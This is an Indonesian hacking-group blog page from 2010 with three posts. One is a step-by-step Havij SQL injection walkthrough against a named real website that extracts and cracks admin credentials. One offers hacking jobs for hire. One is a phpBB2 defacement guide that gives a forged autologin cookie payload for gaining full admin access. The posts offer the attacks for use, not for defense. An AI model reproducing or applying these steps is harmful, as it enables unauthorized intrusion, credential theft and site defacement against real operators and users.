Welcome In My Zone

Selamat Datang  

Kami para blogger pecinta damai yang tergabung jaringan komunitas perentas, blogger, sosial, jaringan ilmu teknologi seia sekata membantu anggota dan masyarakat untuk mengatasi permasalahan dalam dunia internet.

Kami akan membantu dan mencari solusi dengan maksimal berupa ilmu yang akan kami share di blog ini atau memberi jasa membantu permasalahan anda

Anggota kami tersebar di nusantara, ada yang dari Jogyakarta, semarang, ngawi, jakarta dan beberapa kota di kalimantan, sulawesi, sumatera dll Beberapa team kami adalah para perentas handal di bidangnya dan sering membantu klien kami dengan sukses Semoga kami bisa membantu anda

Are you need translate this page? You can scroll down and find translator tool

Kamis, 01 Juli 2010

Havij Injection Tool

Havij 1.10 SQL Injector

Tutor Cara memakai Havij 1.10 SQL Injector

Ini saya mengambil tips dari teman, kemarin telah posted tutor menjalankan program ini, aku cuma copy paste berhubung memang lagi malas, untuk mengulas dan bikin gambar sendiri :

Sebelum nya yang harus dipersiapkan adalah :
1. konek ke internet
2. Download program Havij 1.10 Download

Kita mulai mencoba website
contoh target kita kali ini yaitu http://www.mdsuk.org/content.php?id=8

1) Pertama jalankan program havij .........
trus masukan url target lalu klick gambar segitiga "analyze"
hasilnya kita akan mendapatkan info dari website tersebut ..

2) kedua klick tab info untuk mendapatkan informasi database na dan klick get



3) Setelah mendapatkan informasi database nah ...
sekarang kita ke tab tables untuk mendapatkan tabelsnya, klick get tables dan akhirnya dapet tabelsnya, dan kelihatanlah tables adminya "tbl_admin_user"



4) Setelah itu kita akn mencari columns admin caranya centangin "tbl_admin_user" dan klick get columns dan akhirnya di dapatkan columns "tbl_admin_user"
nah sudah terpampang jelas di mata kita columns username dan password admin....



5) Centangin table username dan password dan klick get data



Akhirnya dapat sudah username dan password admin ... wah senangnya ...
Tapi tunggu dulu itu password admin masih terencrypte ...
Untung havij ini menyediakan tools descrypte md5 untuk mendescrypte password tersebut

6) klick tab yg gambar kunci warna kuning yg tulisannya md5
lalu masukin passwrd encrypte admin tersebut dan klcik start
tunggu sejenak ....dan akhirnya dapet deh password descrypte admin
Selanjut nya kita cari admin page nya ...



7) klick tab find admin trus masukin url target dan klick start ...tgu sejenak dan akhirnya di dapatkan deh admin page nya



Nah sekarang baru bisa masuk dan selanjut nya terserah anda ....

Credit by jimmyromanticdevil

Tag : Havij, Havij tool, Havij SQL, Havij injector, Havij 1.09, Havij 1.10 SQL Injector
Diposting oleh Titus di 05.52 9 komentar
Label:

Jumat, 15 Januari 2010

Job Agreement

Ini tempat bagi anda yang menawarkan job untuk kami

Untuk penawaran job anda bisa kontak kami lewat email atau private messege, jangan terlalu jelas tujuan dan keinginan anda disampaikan dikolom komentar.

Percaya urusan anda pada kami, kami akan melakukan dengan tanggung jawab yg penuh dan dedikasi yang tinggi sehingga maksud dan tujuannya anda berhasil dgn sukses

Salam dari Titus Zone
Diposting oleh Alfian di 14.25 277 komentar
Label:

Hacking PHPBB

Langkah-Langkah Deface PHPBB/PHPBB2 Loser_cs_20


1. Download browser Mozilla FireFox
2. Download pluginnya yg bernama LiveHTTPHeader
download di http://livehttpheaders.mozdev.org/installation.html
cari yg paling baru

3. selanjutnya cari target dengan Uncle Google dgn syntax :
phpBB site:[terserah apa aja]

4. setelah itu buka plugin yg kita download tadi di Tools -> LiveHTTPHeader

5. Ingat, isi LiveHTTPHeader harus kosong

6. buka situs target, dengan begitu LiveHTTPHeader akan mengambil semua cookie yg tercatat di halaman target

7. setelah halaman sukses terbuka ditandai dengan tanda “done” di bawah browser, langkah selanjutnya adalah mengklik LiveHTTPHeader di bagian tengahnya dilanjutkan mengklik opsi Replay..

8. setelah LiveHTTPReplay terbuka liat bagian seperti dibawah ini pada LiveHTTPReplay…

Cookie: phpbb2mysql_data=a%3A0%3A%7B%7D; phpbb2mysql_sid=88da2bbdc1a3a789df094d50d91f7e3b

9. Hapus bagian yg belakang setelah tanda semi colon (

Cookie: phpbb2mysql_data=a%3A0%3A%7B%7D; phpbb2mysql_sid=88da2bbdc1a3a789df094d50d91f7e3b

\_______________hapus bagian ini_________________/

jadinya akan seperti ini :

Cookie: phpbb2mysql_data=a%3A0%3A%7B%7D

10. lalu klik replay lagi, sehingga halaman target akan mereload semua perintah cookie yg telah kita manipulasi

11. selanjutnya perhatikan langkah di bawah ini:

Cookie: phpbb2mysql_data=a%3A0%3A%7B%7D
\________hapus bagian ini dan di ganti dengan:

Cookie: phpbb2mysql_data=a:2{s:11:”autologinid”;s:32:”602baahpepms74d4cb6f2d012e1e4019?;s:6:”userid”;s:1:”2?;}

12. lalu klik replay lagi, sehingga halaman target akan mereload semua perintah cookie yg telah kita manipulasi tadi.

13. perhatikan lagi langkah ini:

Cookie: phpbb2mysql_data=a:2:{s:11:”autologinid”;s:32:”602baahpepms74d4cb6f2d012e1e4019?;s:6:”userid”;s:1:”2?;}
\___________________________bagian ini jg digantilagi_______________________________/

menjadi seperti ini:

Cookie: phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D

14. lalu klik replay lagi, sehingga halaman target akan mereload semua perintah cookie yg telah kita manipulasi tadi.

15. selesai, silakan liat halaman target, kalo anda beruntung anda mendapatkan full admin.

Silakan pergi ke bawah halaman dan lihat opsi “Go To Administration Panel” telah muncul
Diposting oleh Alfian di 14.01 7 komentar
Label:
Langganan: Postingan (Atom)
 
Created by Titus Zone Power by Blogger